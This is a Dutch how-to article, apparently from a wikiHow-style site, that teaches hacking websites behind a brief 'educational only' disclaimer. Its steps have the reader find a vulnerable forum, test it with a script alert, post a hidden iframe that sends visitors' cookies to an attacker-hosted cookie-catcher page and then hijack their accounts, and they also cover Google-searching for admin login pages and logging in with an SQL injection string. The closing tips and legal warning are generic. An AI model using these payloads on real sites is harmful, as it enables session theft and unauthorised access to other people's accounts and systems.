Pdf downloaden
Pdf downloaden
Let op: Deze 'How To' is alleen bedoeld voor educatieve doeleinden, hetzij om mensen te helpen leren wat White Hat hacken is, of om te begrijpen hoe hackers te werk gaan en op die manier eigen sites beter te kunnen beschermen. Deze tutorial laat zien hoe hackers toegang kunnen krijgen tot websites die niet goed zijn beveiligd.
Stappen
-
Zoek een kwetsbare site waar je content kunt posten. Een messageboard of forum is een goed voorbeeld. Onthoud wel dat als de site goed is bescherm, deze methode niet werkt.
-
Maak een post. Je zal een bepaald type code in de "post" op moeten nemen waarmee alle data wordt onderschept van iedereen die erop klikt.
- Test of het systeem de code uitfiltert. Post
<script>window.alert(“test”)</script>
Als er een melding verschijnt wanneer je op de post klikt, dan is de site kwetsbaar.
- Test of het systeem de code uitfiltert. Post
-
Creëer en upload een cookie catcher. Het doel van deze aanval is het onderscheppen van de cookies van een gebruiker, zodat je toegang krijgt tot hun account waarbij gebruik wordt gemaakt van onveilige aanmeldprocedures. De cookie catcher zal de cookies van het slachtoffer opvangen en omleiden. Upload de catcher naar een website waar je toegang tot hebt en php ondersteunt. Een voorbeeld hiervan kun je vinden in het gedeelte met voorbeelden.
-
Plaats de post met je cookie catcher. Plaats de code in de post, zodat je cookies kunt onderscheppen en doorsturen naar je eigen website. Wat hackers dan doen is er tekst bij plaatsen die er onschuldig uitziet en te voorkomen dat de post word verwijderd.
- Een voorbeeldcode ziet er zo uit:
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
- Een voorbeeldcode ziet er zo uit:
-
Het gebruik de verzamelde cookies. Hierna zijn de gegevens in de cookies te gebruiken, omdat ze opgeslagen zijn op de eigen website.Advertentie
-
Zoek een kwetsbare site. Je zal een site moeten vinden die onveilig is, vanwege een gemakkelijk toegankelijke admin login. Zoek op Google naar admin login.asp.
-
Login als een beheerder. Typ admin als de gebruikersnaam en gebruik een aantal tekenreeksen als wachtwoord. Een voorbeeld hiervan is 1’of ’1’=’1.
-
Wees geduldig. Dit vergt waarschijnlijk wat proberen en nogmaals proberen.
-
Toegang tot de website. Uiteindelijk zou je in staat moeten zijn om een tekenreeks te vinden waarmee je toegang kunt krijgen tot de website als beheerder, aangenomen dat het hier gaat om een slecht of niet beveiligde website.Advertentie
-
Leer een aantal programmeertalen. Als je echt wilt leren hoe je websites kunt hacken, dan zal je echt moeten begrijpen hoe computers en programmeertalen werken. Leer programmeertalen zoals Python of SQL, zodat je meer controle hebt over computers en kwetsbare onderdelen van systemen kunt herkennen.
-
Zorg dat je iets afweet van HTML. Je hebt ook veel kennis nodig van html en javascript, zeker als het gaat om het beveiligen van websites. Dit kan tijd kosten om te leren maar op internet is alle informatie aanwezig, dus als je wilt kun je alles leren wat nodig is.
-
Raadpleeg andere white hats. White hats zijn hackers die hun krachten voor goede zaken aanwenden, waarbij ze beveiligingslekken blootleggen en ervoor zorgen dat het internet een betere plek wordt voor iedereen. Als je het hacken wilt leren om hier iets goeds mee te doen, zoals bijvoorbeeld het beveiligen van je eigen site, zoek dan de hulp van white hats met meer ervaring.
-
Doe onderzoek naar hacken. Als je wilt leren hoe je kunt hacken of gewoon jezelf wilt beschermen, dan zal je veel onderzoek moeten doen. Er zijn zoveel verschillende manieren waarop een website kwetsbaar kan zijn, en deze lijst verandert voortdurend, dus je zult constant moeten blijven bijleren.
-
Blijf bij de tijd. Omdat de lijst met mogelijke hacks voortdurend verandert, moet je ervoor zorgen dat je up-to-date blijft. Alleen maar omdat je site beschermd is tegen een bepaalde vorm van hacken betekent nog niet dat dit zo blijft!Advertentie
Tips
- Bezoek hacker-forums voor ladingen handige tips.
Advertentie
Waarschuwingen
- Hacken van computers en websites anders dan die van jezelf is strafbaar. Oefen deze vaardigheden zodat je eigen sites en die van anderen beter kunt beveiligen.
- Als je dit artikel hebt gelezen, dan ben je niet meteen een hacker. Je zal veel moeten lezen, leren en oefenen.
Advertentie
Bronnen
Advertentie